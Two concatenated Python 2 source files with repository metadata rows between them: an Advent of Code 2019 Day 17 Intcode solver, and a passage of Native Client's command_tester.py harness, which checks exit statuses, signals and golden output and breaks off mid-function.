] | null | null | null | 2019/day17/day17.py | mdelmage/advent2019 | eae18fd8010c9816b22578d6eb8988139aef131d | [
"MIT"
] | null | null | null | #!/usr/bin/python
# coding: utf-8
import copy
from collections import namedtuple
# Poked into Intcode memory before execution (see the main loop below):
# address 0 is overwritten with the value 2.
WAKEUP_ADDR = 0
WAKEUP_CMD = 2
class IntcodeNode:
    """Intcode virtual machine (Python 2) specialized for Day 17.

    Runs an Intcode program, feeds it a scripted movement routine as ASCII
    input, and records its ASCII output into a 2-D map (plus the final
    large "dust" value).
    """
    # A resolved parameter: (memory address, value at that address).
    Pointer = namedtuple('Pointer', 'address value')
    OPCODE_ADD = 1
    OPCODE_MULTIPLY = 2
    OPCODE_INPUT = 3
    OPCODE_OUTPUT = 4
    OPCODE_JIT = 5
    OPCODE_JIF = 6
    OPCODE_LT = 7
    OPCODE_EQ = 8
    OPCODE_RELATIVE = 9
    OPCODE_HALT = 99
    # Parameter addressing modes.
    ADDRESS_POSITION = 0
    ADDRESS_IMMEDIATE = 1
    ADDRESS_RELATIVE = 2
    # Instruction widths in memory cells; 0 for opcodes that set the
    # program counter themselves (jumps) or end execution (halt).
    opcode_lengths = { OPCODE_ADD : 4,
                       OPCODE_MULTIPLY : 4,
                       OPCODE_INPUT : 2,
                       OPCODE_OUTPUT : 2,
                       OPCODE_JIT : 0,
                       OPCODE_JIF : 0,
                       OPCODE_LT : 4,
                       OPCODE_EQ : 4,
                       OPCODE_RELATIVE : 2,
                       OPCODE_HALT : 0 }
    def __init__(self, program):
        # Copy the program so the caller's dict is never mutated.
        self.program = copy.deepcopy(program)
        self.relative_base = 0
        self.pc = 0
        self.output = []
        # Day 17-specific attributes
        self.x = 0
        self.y = 0
        self.map = {}
        self.dust = None
        # Main routine, Functions A,B,C and video feed options
        main = "A,C,A,C,B,B,C,A,C,B\n"
        func_a = "L,8,R,12,R,12,R,10\n"
        func_b = "L,10,R,10,L,6\n"
        func_c = "R,10,R,12,R,10\n"
        video = "n\n"
        self.input = main + func_a + func_b + func_c + video
        self.input_index = 0
    def read(self, address):
        # Uninitialized memory reads as 0, per the Intcode specification.
        if address in self.program:
            return self.program[address]
        else:
            return 0
    def write(self, address, value):
        self.program[address] = value
    def parameter(self, address, mode):
        """Resolve the instruction parameter at offset `address` (1-based)
        from the current pc, according to the addressing `mode`."""
        param = 0
        # Use exceptions to simplify command processing.
        # Shorter opcodes may dereference invalid memory
        # when calculating extra params.
        try:
            if self.ADDRESS_POSITION == mode:
                # Return (parameter, *parameter)
                param = self.Pointer(self.read(self.pc + address), self.read(self.read(self.pc + address)))
            elif self.ADDRESS_IMMEDIATE == mode:
                # Return (&parameter, parameter)
                param = self.Pointer(self.pc + address, self.read(self.pc + address))
            elif self.ADDRESS_RELATIVE == mode:
                # Return (parameter + relative base, *(parameter + relative base)
                param = self.Pointer(self.read(self.pc + address) + self.relative_base, self.read(self.read(self.pc + address) + self.relative_base))
            else:
                print "Unknown parameter mode {0}!".format(mode)
        except:
            pass
        return param
    def execute(self):
        """Run the program until it halts (or hits an unknown opcode)."""
        while self.read(self.pc) != self.OPCODE_HALT:
            # Decode: two low digits are the opcode, higher digits are the
            # per-parameter addressing modes.
            instruction = self.read(self.pc)
            opcode = instruction % 100
            param1_mode = (instruction / 100) % 10
            param2_mode = (instruction / 1000) % 10
            param3_mode = (instruction / 10000) % 10
            param1 = self.parameter(1, param1_mode)
            param2 = self.parameter(2, param2_mode)
            param3 = self.parameter(3, param3_mode)
            if self.OPCODE_ADD == opcode:
                self.write(param3.address, param1.value + param2.value)
            elif self.OPCODE_MULTIPLY == opcode:
                self.write(param3.address, param1.value * param2.value)
            elif self.OPCODE_INPUT == opcode:
                # Feed the next character of the scripted ASCII input.
                self.write(param1.address, ord(self.input[self.input_index]))
                self.input_index += 1
            elif self.OPCODE_OUTPUT == opcode:
                # Values above the ASCII range are the final dust count;
                # everything else is a map character, echoed to stdout.
                if param1.value > 256:
                    self.dust = param1.value
                else:
                    self.map[(self.x, self.y)] = param1.value
                    if ord('\n') == param1.value:
                        self.x = 0
                        self.y += 1
                        print ""
                    else:
                        self.x += 1
                        print chr(param1.value),
            elif self.OPCODE_JIT == opcode:
                # Jump-if-true: pc is set directly (opcode_lengths entry is 0).
                self.pc = param2.value if param1.value != 0 else self.pc + 3
            elif self.OPCODE_JIF == opcode:
                self.pc = param2.value if param1.value == 0 else self.pc + 3
            elif self.OPCODE_LT == opcode:
                self.write(param3.address, 1 if param1.value < param2.value else 0)
            elif self.OPCODE_EQ == opcode:
                self.write(param3.address, 1 if param1.value == param2.value else 0)
            elif self.OPCODE_RELATIVE == opcode:
                self.relative_base += param1.value
            else:
                print "Unknown opcode {0} @ PC {1} RB {2}!".format(opcode, self.pc, self.relative_base)
                break
            self.pc += self.opcode_lengths[opcode]
        #print "halt @ PC {0} ({1})".format(self.pc, self.read(self.pc))
# Open input file
# (Python 2 script: each line of day17.txt is one comma-separated Intcode
# program; normally the file holds a single line.)
with open("day17.txt", "r") as f:
    for line in f:
        i = 0
        program = {}  # Intcode memory: address -> value
        for item in line.strip().split(","):
            program[i] = int(item)
            i += 1
        # Phase I: Produce a map with Intcode program
        program[WAKEUP_ADDR] = WAKEUP_CMD
        node = IntcodeNode(program)
        node.execute()
        # Count the intersections
        # A scaffold cell ('#') is an intersection when all four orthogonal
        # neighbours exist in the map and are scaffold too.
        alignment_sum = 0
        for location in node.map:
            if ord('#') == node.map[location]:
                if (location[0] + 1, location[1] + 0) in node.map and \
                   (location[0] + 0, location[1] + 1) in node.map and \
                   (location[0] - 1, location[1] + 0) in node.map and \
                   (location[0] + 0, location[1] - 1) in node.map and \
                   ord('#') == node.map[(location[0] + 1, location[1] + 0)] and \
                   ord('#') == node.map[(location[0] + 0, location[1] + 1)] and \
                   ord('#') == node.map[(location[0] - 1, location[1] + 0)] and \
                   ord('#') == node.map[(location[0] + 0, location[1] - 1)]:
                    # Alignment parameter = product of the coordinates.
                    alignment_sum += (location[0] * location[1])
        print "Sum of alignment parameters is {0}".format(alignment_sum)
print "Dust collected: {0}".format(node.dust) | 37.264706 | 149 | 0.513181 |
89889a3c22c80d57c8a6e52e2ef51e20c48ce2ad | 24,593 | py | Python | tools/command_tester.py | kapkic/native_client | 51c8bc8c249d55606232ae011bdfc8b4cab3d794 | [
"BSD-3-Clause"
] | 1 | 2021-12-23T00:36:43.000Z | 2021-12-23T00:36:43.000Z | tools/command_tester.py | kapkic/native_client | 51c8bc8c249d55606232ae011bdfc8b4cab3d794 | [
"BSD-3-Clause"
] | null | null | null | tools/command_tester.py | kapkic/native_client | 51c8bc8c249d55606232ae011bdfc8b4cab3d794 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python2
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Simple testing harness for running commands and checking expected output.
This harness is used instead of shell scripts to ensure windows compatibility
"""
# python2 imports
import getopt
import os
import re
import sys
# local imports
import test_lib
GlobalPlatform=None  # for pychecker, initialized in ProcessOptions
# Streams every Print() call is mirrored to; a report file may be appended.
GlobalReportStream = [sys.stdout]
# Populated by ResetGlobalSettings() before option parsing.
GlobalSettings = {}
# Hook print to we can print to both stdout and a file
def Print(message):
  # Write the message to every registered report stream (stdout plus any
  # report file registered in GlobalReportStream).
  for s in GlobalReportStream:
    print >>s, message
def Banner(message):
  # Emit the message framed by '=' rules.  All three lines go through
  # Print() so the banner also lands in any report file; the original sent
  # the middle line to stdout only, dropping it from report streams.
  Print('=' * 70)
  Print(message)
  Print('=' * 70)
def DifferentFromGolden(actual, golden, output_type):
  """Compares actual output against golden output.

  If there are any differences, output an error message (to stdout) with
  appropriate banners.

  Args:
    actual: actual output from the program under test, as a single
        string.

    golden: expected output from the program under test, as a single
        string.

    output_type: the name / title for the output type being compared.
        Used in banner output.

  Returns:
    True when there is a difference, False otherwise.
  """
  diff_lines = list(test_lib.DiffStringsIgnoringWhiteSpace(golden, actual))
  if not diff_lines:
    return False
  Banner('Error %s diff found' % output_type)
  Print('\n'.join(diff_lines))
  Banner('Potential New Golden Output')
  Print(actual)
  return True
def ResetGlobalSettings():
  """Reset GlobalSettings to its documented defaults before option parsing."""
  global GlobalSettings
  GlobalSettings = {
      'exit_status': 0,
      'using_nacl_signal_handler': False,
      # When declares_exit_status is set, we read the expected exit
      # status from stderr. We look for a line of the form
      # "** intended_exit_status=X". This allows crash tests to
      # declare their expected exit status close to where the crash is
      # generated, rather than in a Scons file. It reduces the risk
      # that the test passes accidentally by crashing during setup.
      'declares_exit_status': False,
      # List of environment variables to set.
      'osenv': '',
      'arch': None,
      'subarch': None,
      # An environment description that should include all factors that may
      # affect tracked performance. Used to compare different environments.
      'perf_env_description': None,
      # Track total time taken for the command: '0' or '1'.
      'track_cmdtime': '0',
      'name': None,
      'report': None,
      'stdin': None,
      'log_file': None,
      'stdout_golden': None,
      'stderr_golden': None,
      'log_golden': None,
      # This option must be '1' for the output to be captured, for checking
      # against golden files, special exit_status signals, etc.
      # When this option is '0', stdout and stderr will be streamed out.
      'capture_output': '1',
      'filter_regex': None,
      'filter_inverse': False,
      'filter_group_only': False,
      # Number of times a test is run.
      # This is useful for getting multiple samples for time perf tests.
      'num_runs': 1,
      # Scripts for processing output along with its arguments.
      # This script is given the output of a single run.
      'process_output_single': None,
      # This script is given the concatenated output of all |num_runs|, after
      # having been filtered by |process_output_single| for individual runs.
      'process_output_combined': None,
      'time_warning': 0,
      'time_error': 0,
      'run_under': None,
      }
def StringifyList(lst):
  """Join a list of strings into a single comma-separated string."""
  separator = ','
  return separator.join(lst)
def DestringifyList(lst):
  """Split a comma-separated string back into a list of strings."""
  # BUG(robertm): , is a legitimate character for an environment variable
  # value.
  separator = ','
  return lst.split(separator)
# The following messages match gtest's formatting. This improves log
# greppability for people who primarily work on Chrome. It also allows
# gtest-specific hooks on the buildbots to fire.
# The buildbots expect test names in the format "suite_name.test_name", so we
# prefix the test name with a bogus suite name (nacl).
def RunMessage():
  # gtest-style start-of-test line for the current test name.
  return '[ RUN      ] %s' % (GlobalSettings['name'],)
def FailureMessage(total_time):
  # gtest-style failure line; total_time is in seconds, reported in ms.
  return '[  FAILED  ] %s (%d ms)' % (GlobalSettings['name'],
                                      total_time * 1000.0)
def SuccessMessage(total_time):
  # gtest-style success line; total_time is in seconds, reported in ms.
  return '[       OK ] %s (%d ms)' % (GlobalSettings['name'],
                                      total_time * 1000.0)
def LogPerfResult(graph_name, trace_name, value, units):
  """Emit a perf RESULT line for the given graph/trace/value/units."""
  # NOTE: This RESULT message is parsed by Chrome's perf graph generator.
  result_line = 'RESULT %s: %s= %s %s' % (graph_name, trace_name, value, units)
  Print(result_line)
def PrintTotalTime(total_time):
  """Log the total command time as a perf result when tracking is enabled."""
  if not int(GlobalSettings['track_cmdtime']):
    return
  LogPerfResult(GlobalSettings['name'],
                'TOTAL_' + GlobalSettings['perf_env_description'],
                '%f' % total_time,
                'secs')
# On POSIX systems, exit() codes are 8-bit. You cannot use exit() to
# make it look like the process was killed by a signal. Instead,
# NaCl's signal handler encodes the signal number into the exit() code
# by returning with exit(-signum) or equivalently, exit((-signum) & 0xff).
def IndirectSignal(signum):
  """Encode signal number `signum` the way NaCl's signal handler reports it.

  POSIX exit() codes are 8-bit, so the handler exits with (-signum) mod 256
  to smuggle the signal number through the exit status.
  """
  return (-signum) % 256
# Windows exit codes that indicate unhandled exceptions.
# (Unsigned NTSTATUS values as they appear in the Windows headers.)
STATUS_ACCESS_VIOLATION = 0xc0000005
STATUS_PRIVILEGED_INSTRUCTION = 0xc0000096
STATUS_FLOAT_DIVIDE_BY_ZERO = 0xc000008e
STATUS_INTEGER_DIVIDE_BY_ZERO = 0xc0000094
# Python's wrapper for GetExitCodeProcess() treats the STATUS_* values
# as negative, although the unsigned values are used in headers and
# are more widely recognised.
def MungeWindowsErrorExit(num):
  """Map an unsigned 32-bit STATUS_* value to Python's signed exit code.

  Python's wrapper for GetExitCodeProcess() reports these statuses as
  negative numbers (the two's-complement reading of the unsigned value),
  although the unsigned forms are what headers document.
  """
  two_to_the_32 = 1 << 32
  return num - two_to_the_32
# If a crash occurs in x86-32 untrusted code on Windows, the kernel
# apparently gets confused about the cause. It fails to take %cs into
# account when examining the faulting instruction, so it looks at the
# wrong instruction, so we could get either of the errors below.
# See http://code.google.com/p/nativeclient/issues/detail?id=1689
# Either status may be reported for an x86-32 untrusted crash on Windows;
# see the issue-1689 comment above.
win32_untrusted_crash_exit = [
    MungeWindowsErrorExit(STATUS_ACCESS_VIOLATION),
    MungeWindowsErrorExit(STATUS_PRIVILEGED_INSTRUCTION)]
# Statuses produced by float/integer divide faults.
win32_sigfpe = [
    MungeWindowsErrorExit(STATUS_FLOAT_DIVIDE_BY_ZERO),
    MungeWindowsErrorExit(STATUS_INTEGER_DIVIDE_BY_ZERO),
]
# We patch Windows' KiUserExceptionDispatcher on x86-64 to terminate
# the process safely when untrusted code crashes.  We get the exit
# code associated with the HLT instruction.
win64_exit_via_ntdll_patch = [
    MungeWindowsErrorExit(STATUS_PRIVILEGED_INSTRUCTION)]
# Mach exception code for Mac OS X.
EXC_BAD_ACCESS = 1
# 32-bit processes on Mac OS X return SIGBUS in most of the cases where Linux
# returns SIGSEGV, except for actual x86 segmentation violations.  64-bit
# processes on Mac OS X behave differently.
# Maps each symbolic --exit_status name to the exit statuses acceptable on
# each platform (keyed by GlobalPlatform; any status in the list passes).
# Optional 'mach_exception' entries give the Mach exception number the NaCl
# signal handler prints on Mac OS X (used by CheckExitStatus).
status_map = {
    'sigtrap' : {
        'linux2': [-5], # SIGTRAP
        'darwin': [-5], # SIGTRAP
        },
    'trusted_sigabrt' : {
        'linux2': [-6], # SIGABRT
        'mac32': [-6], # SIGABRT
        'mac64': [-6], # SIGABRT
        # On Windows, NaClAbort() exits using the HLT instruction.
        'win32': [MungeWindowsErrorExit(STATUS_PRIVILEGED_INSTRUCTION)],
        'win64': [MungeWindowsErrorExit(STATUS_PRIVILEGED_INSTRUCTION)],
        },
    'naclabort_coverage' : {
        # This case is here because NaClAbort() behaves differently when
        # code coverage is enabled.
        # This is not used on Windows.
        'linux2': [IndirectSignal(6)], # SIGABRT
        'mac32': [IndirectSignal(6)], # SIGABRT
        'mac64': [IndirectSignal(6)], # SIGABRT
        },
    'sigpipe': {
        # This is not used on Windows because Windows does not have an
        # equivalent of SIGPIPE.
        'linux2': [-13], # SIGPIPE
        'mac32': [-13], # SIGPIPE
        'mac64': [-13], # SIGPIPE
        },
    'untrusted_sigsegv': {
        'linux2': [-11], # SIGSEGV
        'mac32': [-11], # SIGSEGV
        'mac64': [-11], # SIGSEGV
        'win32': win32_untrusted_crash_exit,
        'win64': win64_exit_via_ntdll_patch,
        },
    'untrusted_sigill' : {
        'linux2': [-4], # SIGILL
        'mac32': [-4], # SIGILL
        'mac64': [-4], # SIGILL
        'win32': win32_untrusted_crash_exit,
        'win64': win64_exit_via_ntdll_patch,
        },
    'untrusted_sigfpe' : {
        'linux2': [-8], # SIGFPE
        'mac32': [-8], # SIGFPE
        'mac64': [-8], # SIGFPE
        'win32': win32_sigfpe,
        'win64': win64_exit_via_ntdll_patch,
        },
    'untrusted_segfault': {
        'linux2': [-11], # SIGSEGV
        'mac32': [-10], # SIGBUS
        'mac64': [-10], # SIGBUS
        'mach_exception': EXC_BAD_ACCESS,
        'win32': win32_untrusted_crash_exit,
        'win64': win64_exit_via_ntdll_patch,
        },
    'untrusted_sigsegv_or_equivalent': {
        'linux2': [-11], # SIGSEGV
        'mac32': [-11], # SIGSEGV
        'mac64': [-10], # SIGBUS
        'win32': win32_untrusted_crash_exit,
        'win64': win64_exit_via_ntdll_patch,
        },
    'trusted_segfault': {
        'linux2': [-11], # SIGSEGV
        'mac32': [-10], # SIGBUS
        'mac64': [-11], # SIGSEGV
        'mach_exception': EXC_BAD_ACCESS,
        'win32': [MungeWindowsErrorExit(STATUS_ACCESS_VIOLATION)],
        'win64': [MungeWindowsErrorExit(STATUS_ACCESS_VIOLATION)],
        },
    'trusted_sigsegv_or_equivalent': {
        'linux2': [-11], # SIGSEGV
        'mac32': [-11], # SIGSEGV
        'mac64': [-11], # SIGSEGV
        'win32': [],
        'win64': [],
        },
    # This is like 'untrusted_segfault', but without the 'untrusted_'
    # prefix which marks the status type as expecting a
    # gracefully-printed exit message from nacl_signal_common.c.  This
    # is a special case because we use different methods for writing
    # the exception stack frame on different platforms.  On Mac and
    # Windows, NaCl uses a system call which will detect unwritable
    # pages, so the exit status appears as an unhandled fault from
    # untrusted code.  On Linux, NaCl's signal handler writes the
    # frame directly, so the exit status comes from getting a SIGSEGV
    # inside the SIGSEGV handler.
    'unwritable_exception_stack': {
        'linux2': [-11], # SIGSEGV
        'mac32': [-10], # SIGBUS
        'mac64': [-10], # SIGBUS
        'win32': win32_untrusted_crash_exit,
        'win64': win64_exit_via_ntdll_patch,
        },
}
def ProcessOptions(argv):
  """Process command line options and return the unprocessed left overs.

  Every key of GlobalSettings is accepted as a '--key=value' long option.
  Values are coerced to int when the existing default is an int, except
  'exit_status' which may be a symbolic status_map name and so stays a
  string.  Also derives GlobalPlatform ('win64', 'mac32'/'mac64', or
  sys.platform) from the platform and the --subarch setting.
  """
  global GlobalPlatform
  ResetGlobalSettings()
  try:
    opts, args = getopt.getopt(argv, '', [x + '=' for x in GlobalSettings])
  except getopt.GetoptError, err:
    Print(str(err))  # will print something like 'option -a not recognized'
    sys.exit(1)
  for o, a in opts:
    # strip the leading '--'
    option = o[2:]
    assert option in GlobalSettings
    if option == 'exit_status':
      GlobalSettings[option] = a
    elif type(GlobalSettings[option]) == int:
      GlobalSettings[option] = int(a)
    else:
      GlobalSettings[option] = a
  if (sys.platform == 'win32') and (GlobalSettings['subarch'] == '64'):
    GlobalPlatform = 'win64'
  elif (sys.platform == 'darwin'):
    # mac32, mac64
    GlobalPlatform = 'mac' + GlobalSettings['subarch']
  else:
    GlobalPlatform = sys.platform
  # return the unprocessed options, i.e. the command
  return args
# Parse output for signal type and number
#
# The '** Signal' output is from the nacl signal handler code.
#
# Since it is possible for there to be an output race with another
# thread, or additional output due to atexit functions, we scan the
# output in reverse order for the signal signature.
def GetNaClSignalInfoFromStderr(stderr):
  """Return the last NaCl signal-handler line found in stderr, or None.

  The '** Signal ...' / '** Mach exception ...' output comes from the NaCl
  signal handler code.  Since other threads (or atexit handlers) may race
  with it and append extra output, lines are scanned in reverse so the most
  recent signature wins.
  """
  signature = re.compile(r'\*\* (Signal|Mach exception) (\d+) from '
                         r'(trusted|untrusted) code')
  for line in reversed(stderr.splitlines()):
    found = signature.match(line)
    if found is not None:
      return found.group(0)
  return None
def GetQemuSignalFromStderr(stderr, default):
  """Extract the signal number from a QEMU crash message, if present.

  QEMU logs 'qemu: uncaught target signal NNN ...' when the emulated
  program dies on a signal.  Returns -NNN for the most recent such line,
  or *default* when stderr contains none.
  """
  expected_prefix = ['qemu:', 'uncaught', 'target', 'signal']
  for line in reversed(stderr.splitlines()):
    words = line.split()
    if len(words) > 4 and words[:4] == expected_prefix:
      return -int(words[4])
  return default
def FormatExitStatus(number):
  """Render an exit status as decimal plus unsigned 32-bit hex.

  The hex form makes the Windows error exit statuses (STATUS_*) more
  recognisable.
  """
  unsigned32 = number & 0xffffffff
  return '%i (0x%x)' % (number, unsigned32)
def PrintStdStreams(stdout, stderr):
  """Print captured stdout and stderr under per-test banners.

  NOTE(review): both streams are printed only when *stderr* was captured
  (is not None); stdout alone is never printed.  Callers appear to capture
  either both streams or neither -- confirm before relying on this.
  """
  if stderr is not None:
    Banner('Stdout for %s:' % os.path.basename(GlobalSettings['name']))
    Print(stdout)
    Banner('Stderr for %s:' % os.path.basename(GlobalSettings['name']))
    Print(stderr)
def GetIntendedExitStatuses(stderr):
  """Collect every '** intended_exit_status=...' value announced in stderr.

  Returns the values in the order they appear; the list is empty when the
  command never declared an intended status.
  """
  pattern = re.compile(r'\*\* intended_exit_status=(.*)$')
  matches = (pattern.match(line) for line in stderr.splitlines())
  return [m.group(1) for m in matches if m is not None]
def CheckExitStatus(failed, req_status, using_nacl_signal_handler,
                    exit_status, stdout, stderr):
  """Check the command's exit status (and signal output) against expectations.

  Args:
    failed: whether the harness already considers the run failed.
    req_status: the requested status: a symbolic status_map key or a
        number.  Ignored when --declares_exit_status is set, in which case
        the expectation is read from the command's own
        '** intended_exit_status=...' stderr line.
    using_nacl_signal_handler: whether the '** Signal ...' line printed by
        NaCl's signal handler should also be verified.
    exit_status: the observed exit status.
    stdout, stderr: captured output, or None when output was not captured.

  Returns:
    True when the run passes; False otherwise (errors are Print()ed).
  """
  if GlobalSettings['declares_exit_status']:
    # The test binary announces its own expected status; --exit_status must
    # be left at its default of 0 in this mode.
    assert req_status == 0
    intended_statuses = GetIntendedExitStatuses(stderr)
    if len(intended_statuses) == 0:
      Print('\nERROR: Command returned exit status %s but did not output an '
            'intended_exit_status line to stderr - did it exit too early?'
            % FormatExitStatus(exit_status))
      return False
    elif len(intended_statuses) != 1:
      Print('\nERROR: Command returned exit status %s but produced '
            'multiple intended_exit_status lines (%s)'
            % (FormatExitStatus(exit_status), ', '.join(intended_statuses)))
      return False
    else:
      req_status = intended_statuses[0]
  expected_sigtype = 'normal'
  if req_status in status_map:
    # Symbolic status: resolve the per-platform acceptable exit statuses.
    expected_statuses = status_map[req_status][GlobalPlatform]
    if using_nacl_signal_handler:
      if req_status.startswith('trusted_'):
        expected_sigtype = 'trusted'
      elif req_status.startswith('untrusted_'):
        expected_sigtype = 'untrusted'
  else:
    expected_statuses = [int(req_status)]
  # Work out what the NaCl signal handler should have printed, if anything.
  expected_printed_status = None
  if expected_sigtype != 'normal':
    if sys.platform == 'darwin':
      # Mac OS X
      default = '<mach_exception field missing for %r>' % req_status
      expected_printed_status = '** Mach exception %s from %s code' % (
          status_map.get(req_status, {}).get('mach_exception', default),
          expected_sigtype)
    else:
      # Linux
      assert sys.platform != 'win32'
      assert len(expected_statuses) == 1
      assert expected_statuses[0] < 0
      expected_printed_signum = -expected_statuses[0]
      expected_printed_status = '** Signal %d from %s code' % (
          expected_printed_signum,
          expected_sigtype)
      # The signal handler exits via exit(), so the observed status is the
      # 8-bit encoded form of the signal, not the raw -signum.
      expected_statuses = [IndirectSignal(expected_printed_signum)]
  # If an uncaught signal occurs under QEMU (on ARM), the exit status
  # contains the signal number, mangled as per IndirectSignal().  We
  # extract the unadulterated signal number from QEMU's log message in
  # stderr instead.  If we are not using QEMU, or no signal is raised
  # under QEMU, this is a no-op.
  if stderr is not None:
    exit_status = GetQemuSignalFromStderr(stderr, exit_status)
  msg = '\nERROR: Command returned exit status %s but we expected %s' % (
      FormatExitStatus(exit_status),
      ' or '.join(FormatExitStatus(value) for value in expected_statuses))
  if exit_status not in expected_statuses:
    Print(msg)
    failed = True
  if using_nacl_signal_handler and stderr is not None:
    actual_printed_status = GetNaClSignalInfoFromStderr(stderr)
    msg = ('\nERROR: Command printed the signal info %r to stderr '
           'but we expected %r' %
           (actual_printed_status, expected_printed_status))
    if actual_printed_status != expected_printed_status:
      Print(msg)
      failed = True
  return not failed
def CheckTimeBounds(total_time):
  """Check elapsed time against the --time_error / --time_warning limits.

  Exceeding time_error fails the test (returns False); exceeding
  time_warning only logs a warning.  A limit of 0 disables that check.
  """
  if GlobalSettings['time_error']:
    if total_time > GlobalSettings['time_error']:
      Print('ERROR: should have taken less than %f secs' %
            (GlobalSettings['time_error']))
      return False
  if GlobalSettings['time_warning']:
    if total_time > GlobalSettings['time_warning']:
      Print('WARNING: should have taken less than %f secs' %
            (GlobalSettings['time_warning']))
  return True
def CheckGoldenOutput(stdout, stderr):
  """Compare stdout, stderr and the log file against golden files.

  Each stream is only read (the log file only opened) when the matching
  --<stream>_golden option is configured; output may first be run through
  the --filter_* options.  Returns False on the first mismatch.
  """
  for (stream, getter) in [
      ('stdout', lambda: stdout),
      ('stderr', lambda: stderr),
      # Lazy so the log file is only opened when a log golden is configured.
      ('log', lambda: open(GlobalSettings['log_file']).read()),
      ]:
    golden = stream + '_golden'
    if GlobalSettings[golden]:
      golden_data = open(GlobalSettings[golden]).read()
      actual = getter()
      if GlobalSettings['filter_regex']:
        actual = test_lib.RegexpFilterLines(GlobalSettings['filter_regex'],
                                            GlobalSettings['filter_inverse'],
                                            GlobalSettings['filter_group_only'],
                                            actual)
      if DifferentFromGolden(actual, golden_data, stream):
        return False
  return True
def ProcessLogOutputSingle(stdout, stderr):
  """Run the --process_output_single post-processor over one run's output.

  The processor command receives the concatenated NaClLog output (read from
  --log_file, where it lands on Windows), stdout and stderr.  Returns a
  (success, new_stdout, new_stderr) tuple; when no processor is configured
  the output passes through unchanged.
  """
  output_processor = GlobalSettings['process_output_single']
  if output_processor is None:
    return (True, stdout, stderr)
  else:
    output_processor_cmd = DestringifyList(output_processor)
    # Also, get the output from log_file to get NaClLog output in Windows.
    log_output = open(GlobalSettings['log_file']).read()
    # Assume the log processor does not care about the order of the lines.
    all_output = log_output + stdout + stderr
    _, retcode, failed, new_stdout, new_stderr = \
        test_lib.RunTestWithInputOutput(output_processor_cmd, all_output)
    # Print the result, since we have done some processing and we need
    # to have the processed data.  However, if we intend to process it some
    # more later via process_output_combined, do not duplicate the data here.
    # Only print out the final result!
    if not GlobalSettings['process_output_combined']:
      PrintStdStreams(new_stdout, new_stderr)
    if retcode != 0 or failed:
      return (False, new_stdout, new_stderr)
    else:
      return (True, new_stdout, new_stderr)
def ProcessLogOutputCombined(stdout, stderr):
  """Run the --process_output_combined post-processor over all runs' output.

  Invoked once, after every run has finished, with the concatenated stdout
  and stderr of all runs.  Returns True on success or when no processor is
  configured.
  """
  output_processor = GlobalSettings['process_output_combined']
  if output_processor is None:
    return True
  else:
    output_processor_cmd = DestringifyList(output_processor)
    all_output = stdout + stderr
    _, retcode, failed, new_stdout, new_stderr = \
        test_lib.RunTestWithInputOutput(output_processor_cmd, all_output)
    # Print the result, since we have done some processing.
    PrintStdStreams(new_stdout, new_stderr)
    if retcode != 0 or failed:
      return False
    else:
      return True
def DoRun(command, stdin_data):
  """
  Run the command, given stdin_data.  Returns a return code (0 is good)
  and optionally a captured version of stdout, stderr from the run
  (if the global setting capture_output is true).
  """
  # Initialize stdout, stderr to indicate we have not captured
  # any of stdout or stderr.
  stdout = ''
  stderr = ''
  if not int(GlobalSettings['capture_output']):
    # We are only blurting out the stdout and stderr, not capturing it
    # for comparison, etc.  All output-comparison settings must therefore
    # be unset.
    assert (not GlobalSettings['stdout_golden']
            and not GlobalSettings['stderr_golden']
            and not GlobalSettings['log_golden']
            and not GlobalSettings['filter_regex']
            and not GlobalSettings['filter_inverse']
            and not GlobalSettings['filter_group_only']
            and not GlobalSettings['process_output_single']
            and not GlobalSettings['process_output_combined']
            )
    # If python2 ever changes popen.stdout.read() to not risk deadlock,
    # we could stream and capture, and use RunTestWithInputOutput instead.
    (total_time, exit_status, failed) = test_lib.RunTestWithInput(command,
                                                                  stdin_data)
    PrintTotalTime(total_time)
    if not CheckExitStatus(failed,
                           GlobalSettings['exit_status'],
                           GlobalSettings['using_nacl_signal_handler'],
                           exit_status, None, None):
      Print(FailureMessage(total_time))
      return (1, stdout, stderr)
  else:
    (total_time, exit_status,
     failed, stdout, stderr) = test_lib.RunTestWithInputOutput(
         command, stdin_data)
    PrintTotalTime(total_time)
    # CheckExitStatus may spew stdout/stderr when there is an error.
    # Otherwise, we do not spew stdout/stderr in this case (capture_output).
    if not CheckExitStatus(failed,
                           GlobalSettings['exit_status'],
                           GlobalSettings['using_nacl_signal_handler'],
                           exit_status, stdout, stderr):
      PrintStdStreams(stdout, stderr)
      Print(FailureMessage(total_time))
      return (1, stdout, stderr)
  # The golden and single-run processor checks are no-ops in the
  # non-capturing branch (their settings are asserted unset above), so they
  # can run unconditionally here.
  if not CheckGoldenOutput(stdout, stderr):
    Print(FailureMessage(total_time))
    return (1, stdout, stderr)
  success, stdout, stderr = ProcessLogOutputSingle(stdout, stderr)
  if not success:
    Print(FailureMessage(total_time) + ' ProcessLogOutputSingle failed!')
    return (1, stdout, stderr)
  if not CheckTimeBounds(total_time):
    Print(FailureMessage(total_time))
    return (1, stdout, stderr)
  Print(SuccessMessage(total_time))
  return (0, stdout, stderr)
def DisableCrashDialog():
  """
  Disable Windows' crash dialog box, which pops up when a process exits with
  an unhandled fault.  This causes the process to hang on the Buildbots.  We
  duplicate this function from SConstruct because ErrorMode flags are
  overwritten in scons due to race conditions.  See bug
  https://code.google.com/p/nativeclient/issues/detail?id=2968
  """
  if sys.platform == 'win32':
    # Imported lazily so non-Windows hosts do not need pywin32 installed.
    import win32api
    import win32con
    # The double call is to preserve existing flags, as discussed at
    # http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx
    new_flags = win32con.SEM_NOGPFAULTERRORBOX
    existing_flags = win32api.SetErrorMode(new_flags)
    win32api.SetErrorMode(existing_flags | new_flags)
def Main(argv):
  """Entry point: parse options, set up the environment, run the command
  --num_runs times via DoRun, then post-process the combined output.

  Returns a process exit code: 0 on success, non-zero on the first failing
  run or a failing combined post-processor.
  """
  DisableCrashDialog()
  command = ProcessOptions(argv)
  if GlobalSettings['report']:
    GlobalReportStream.append(open(GlobalSettings['report'], 'w'))
  if not GlobalSettings['name']:
    GlobalSettings['name'] = command[0]
  GlobalSettings['name'] = os.path.basename(GlobalSettings['name'])
  Print(RunMessage())
  num_runs = GlobalSettings['num_runs']
  if num_runs > 1:
    Print(' (running %d times)' % num_runs)
  if GlobalSettings['osenv']:
    Banner('setting environment')
    env_vars = DestringifyList(GlobalSettings['osenv'])
  else:
    env_vars = []
  for env_var in env_vars:
